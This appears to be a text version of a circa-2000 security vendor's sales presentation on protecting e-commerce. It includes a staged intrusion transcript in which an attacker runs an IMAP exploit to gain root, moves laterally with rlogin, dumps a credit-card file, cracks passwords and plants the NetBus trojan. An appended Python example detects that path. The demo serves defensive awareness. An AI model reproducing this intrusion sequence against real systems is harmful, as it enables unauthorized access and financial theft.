Protecting The Digital Economy
David Gerulski, Director of Marketing, Internet Security Systems
Agenda
• Introduction
• E-Commerce Security Drivers
• Developing a Security Policy
• Anatomy of an Attack
• Policy Enforcement
• Enterprise Risk Management
• Security Resources
• Conclusion
ISS Overview
• Headquartered in Atlanta, GA, USA
• Pioneered vulnerability assessment and intrusion detection technology
• Leader in Enterprise Security Management
• Publicly traded on NASDAQ: ISSX
• Industry-leading technology: 35+ product awards
• 1,000+ employee owners worldwide
• Over 300 certified security partners
• Over 7,500 customers worldwide
ISS Market Share (pie charts): Network Intrusion Detection & Assessment Market; Network Intrusion Detection Market; Network Vulnerability Assessment Market. Source: International Data Corporation (IDC), August 1999
Business Is Changing
Yesterday: Internal Focus. Access is granted to employees only.
Today: External Focus. Suppliers, customers, and prospects all need some form of access.
Yesterday: Centralized Assets. Applications and data are centralized in fortified IT bunkers.
Today: Distributed Assets. Applications and data are distributed across servers, locations, and business units.
Yesterday: Prevent Losses. The goal of security is to protect against confidentiality breaches.
Today: Generate Revenue. The goal of security is to enable eCommerce.
Yesterday: IT Control. Security manager decides who gets access.
Today: Business Control. Business units want the authority to grant access.
Source: Forrester Research, Inc.
The Threat Grows (bar chart, y-axis 20% to 60%): 38% in 1996, 47% in 1997, 54% in 1998. Source: 1998 Computer Security Institute/FBI Computer Crime and Security Survey
E-Commerce Issues
Principal Business Drivers
• Increase Revenue
• Increase Profitability
Principal Security Drivers
• Greater Susceptibility to Attack
• Greater Probability of Catastrophic Consequences
• Much Greater “Loss to Incident” Ratio
Our Strength Is Our Weakness
• In Touch With Anyone With a Modem
• Have an International Presence
• Partners Can Now Collaborate
• Leverage Web-based Supply Chain Technologies
• Employees Can Work From Home, at Night, Over the Weekends, and on Holiday
• Application Servers Can Support Entire Divisions
DDoS (Distributed Denial-of-Service) diagram: hosts at Company A, Company B, University A, Company C and Company D, with a router, firewall, web server and UNIX/NT servers on the target network.
Consequences
• Exposure to Legal Liability
• Decreased Stockholder Equity
• 30 Seconds on CNN
• Damaged Image
• Decreased Employee Productivity
• Loss of Intellectual Property & Assets
• Inefficient Use of Resources
Summary
• E-Business is here to stay
• Networks are exposed and under attack
• There’s no more turning a “blind eye”
• It’s a business issue and it should be treated in a business-like manner
• Implement a security program, not a security technology
Security Policy
• Blueprint for a Good Security Program
• Standards Based - British Standard 7799
• Management Buy-In
• High Level to Technical
• Business Driven, Not Vendor Driven
• Non-Static
Enforced Security Policy
• Minimize Exposure to Vulnerabilities
• Prepare for Attacks on Our Systems
• Manage Internal Staff Behavior
• Manage External Access and Activity
• Maintain Appropriate Security Configurations & Response Strategies
• Exploit Built-in Security Features
• Measure and Record Patterns and Trends for Future Security Planning
Registrant:
   Big Widget, Inc. (BIGWIDGET_DOM)
   1111 Big Widget Drive
   Really Big, CA 90120
   US

   Domain Name: BIGWIDGET.COM

   Administrative Contact, Technical Contact:
      Simms, Haywood (HS69)   Haywood.Simms@BIGWIDGET.COM
      1111 Big Widget Drive, UMIL04-07
      Really Big, CA 90210
      678-443-6001
   Zone Contact, Billing Contact:
      Dodge, Rodger (RD32)   Rodger.Dodge@BIGWIDGET.COM
      1111 Big Widget Drive, UMIL04-47
      Really Big, CA 90210
      678-443-6014

   Record last updated on 24-June-2000
   Record expires on 20-Mar-2010
   Record created on 14-Mar-1998
   Database last updated on 7-Jun-2000 15:54

   Domain servers in listed order:
   EHECATL.BIGWIDGET.COM       208.21.0.7
   NS1-AUTH.SPRINTLINK.NET     206.228.179.10
   NS.COMMANDCORP.COM          130.205.70.10
hacker:~$ telnet bigwidget.com 25
Trying 10.0.0.28...
Connected to bigwidget.com.
Escape character is '^]'.
Connection closed by foreign host.
hacker:~$ telnet bigwidget.com 143
Trying 10.0.0.28...
Connected to bigwidget.com.
* OK bigwidget IMAP4rev1 Service 9.0(157) at Wed, 14 Oct 1998 11:51:50 -0400 (EDT) (Report problems in this server to MRC@CAC.Washington.EDU)
. logout
* BYE bigwidget IMAP4rev1 server terminating connection
. OK LOGOUT completed
Connection closed by foreign host.
hacker:~$ ./imap_exploit bigwidget.com
IMAP Exploit for Linux.
Author: Akylonius (aky@galeb.etf.bg.ac.yu)
Modifications: p1 (p1@el8.org)
Completed successfully.
hacker:~$ telnet bigwidget.com
Trying 10.0.0.28...
Connected to bigwidget.com.
Red Hat Linux release 4.2 (Biltmore)
Kernel 2.0.35 on an i686
login: root
bigwidget:~# whoami
root
bigwidget:~# cd /etc
bigwidget:~# cat ./hosts
127.0.0.1     localhost localhost.localdomain
208.21.2.10   thevault    accounting
208.21.2.11   fasttalk    sales
208.21.2.12   geekspeak   engineering
208.21.2.13   people      human resources
208.21.2.14   thelinks    marketing
208.21.2.15   thesource   information systems
bigwidget:~# rlogin thevault
thevault:~# cd /data/creditcards
thevault:~# cat visa.txt
Allan B. Smith     6543-2223-1209-4002   12/99
Donna D. Smith     6543-4133-0632-4572   06/98
Jim Smith          6543-2344-1523-5522   01/01
Joseph L. Smith    6543-2356-1882-7532   04/02
Kay L. Smith       6543-2398-1972-4532   06/03
Mary Ann Smith     6543-8933-1332-4222   05/01
Robert F. Smith    6543-0133-5232-3332   05/99
thevault:~# crack /etc/passwd
Cracking /etc/passwd...
username: bobman   password: nambob
username: mary     password: mary
username: root     password: ncc1701
thevault:~# ftp thesource
Connected to thesource
220 thesource Microsoft FTP Service (Version 4.0).
Name: administrator
331 Password required for administrator.
Password: *******
230 User administrator logged in.
Remote system type is Windows_NT.
ftp> cd \temp
250 CWD command successful.
ftp> send netbus.exe
local: netbus.exe remote: netbus.exe
200 PORT command successful.
150 Opening BINARY mode data connection for netbus.exe
226 Transfer complete.
ftp> quit
thevault:~$ telnet thesource
Trying 208.21.2.160...
Connected to thesource.bigwidget.com.
Escape character is '^]'.
Microsoft (R) Windows NT (TM) Version 4.00 (Build 1381)
Welcome to MS Telnet Service
Telnet Server Build 5.00.98217.1
login: administrator
password: *******
*===============================================================
Welcome to Microsoft Telnet Server.
*===============================================================
C:\> cd \temp
C:\TEMP> netbus.exe
NetBus 1.6, by cf - Connected to the.source.bigwidget.com - Screendump
From: David Smith <dsmith@bigwidget.com>
To: President@bigwidget.com
Subject: My Raise <URGENT>

Dear Mr. Smith,
I would like to thank you for the huge raise that you have seen fit to give me. With my new salary of $350,000.00 a year I am sure I am the highest paid mail clerk in the company. This really makes me feel good because I deserve it.
Your Son,
Dave
Anatomy of the Attack (diagram of BigWidget’s network: router, firewall, web server, e-mail server, UNIX and NT servers, clients & workstations; the three steps labelled on the diagram are imap, Crack and NetBus).
Real World Web Page Defacements
Policy Enforcement Through Detection and Response
What Is Vulnerable? IT Infrastructure: Web Server, Servers, Firewall, Router, Network, E-Mail Server, Clients & Workstations
What Is Vulnerable? Applications: E-Commerce Web Server, PeopleSoft, SAP, Firewall, Router, E-Mail Server, Web Browsers
What Is Vulnerable? Databases: Microsoft SQL Server, Sybase, Oracle, Firewall, Router
What Is Vulnerable? Operating Systems: Solaris, HP-UX, Windows NT, AIX, Windows 95 & NT, Firewall, Router, Network
What Is Vulnerable? Networks: Web Server, Servers, Firewall, Router, TCP/IP, Netware, E-Mail Server
Enterprise Risk Management
Vulnerability Assessment Service: corrective action report
Vulnerability: GetAdmin
Severity: High Risk
IP Address: 215.011.200.255
OS: Windows NT 4.0
Fix: From the Start menu, choose Programs/Administrative Tools/User Manager. Under Policies/User Rights, check the users who have admin privileges on that host. Stronger action may be needed, such as reinstalling the operating system from CD. Consider this host compromised, as well as any passwords from any other users on this host. In addition, apply the post-SP3 getadmin patch, or SP4 when available. Also refer to Microsoft Knowledge Base Article Q146965.txt.
Managed Intrusion Detection Service (diagram, with an internal sensor): attack detected; record session; session logged; email alert / log; session terminated; reconfigure firewall / router.
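The detect-and-respond flow on the slide (attack detected, session logged, e-mail alert, session terminated, firewall/router reconfigured), applied to the path from the Anatomy of the Attack slides, as an added Python example that is not part of the original deck. The log format, the asset inventory and the external address 198.51.100.7 are constructed for the example.

```python
from dataclasses import dataclass, field

LATERAL_PORTS = {21: "ftp", 23: "telnet", 513: "rlogin"}  # services the walkthrough hops over
INTERNAL = {"bigwidget.com", "thevault", "thesource"}   # constructed asset inventory

# Constructed session log ("time src dst port"), following the attack path on the slides:
# outside -> bigwidget.com (smtp, imap) -> thevault (rlogin) -> thesource (ftp, telnet).
LOG = """\
11:51 198.51.100.7 bigwidget.com 25
11:52 198.51.100.7 bigwidget.com 143
11:58 bigwidget.com thevault 513
12:03 thevault thesource 21
12:05 thevault thesource 23
12:10 thesource thevault 445
"""

@dataclass
class Finding:
    origin: str                                 # external address that started the chain
    hops: list = field(default_factory=list)    # "src -> dst (service)" per internal hop
    actions: list = field(default_factory=list) # response steps from the slide's diagram

def correlate(log: str) -> list:
    """Flag internal hosts that, after a session from outside, start ftp/telnet/rlogin
    sessions to other internal hosts, and attach the response steps from the diagram.
    A production correlator would also bound the chain by a time window; this one
    only orders by log position (an assumption kept simple for the example)."""
    tainted = {}    # internal host -> external origin that reached it, directly or via hops
    findings = {}   # origin -> Finding
    for line in log.splitlines():
        _, src, dst, port = line.split()
        port = int(port)
        if src not in INTERNAL and dst in INTERNAL:
            tainted[dst] = src                      # entry point from outside
        elif src in tainted and dst in INTERNAL and port in LATERAL_PORTS:
            origin = tainted[src]
            tainted[dst] = origin                   # next hop inherits the origin
            f = findings.setdefault(origin, Finding(origin))
            f.hops.append(f"{src} -> {dst} ({LATERAL_PORTS[port]})")
    for f in findings.values():
        f.actions = ["LOG SESSION", "EMAIL ALERT", "TERMINATE SESSION",
                     f"RECONFIGURE FIREWALL/ROUTER: block {f.origin}"]
    return list(findings.values())

if __name__ == "__main__":
    for f in correlate(LOG):
        print(f.origin, f.hops, f.actions, sep="\n  ")
```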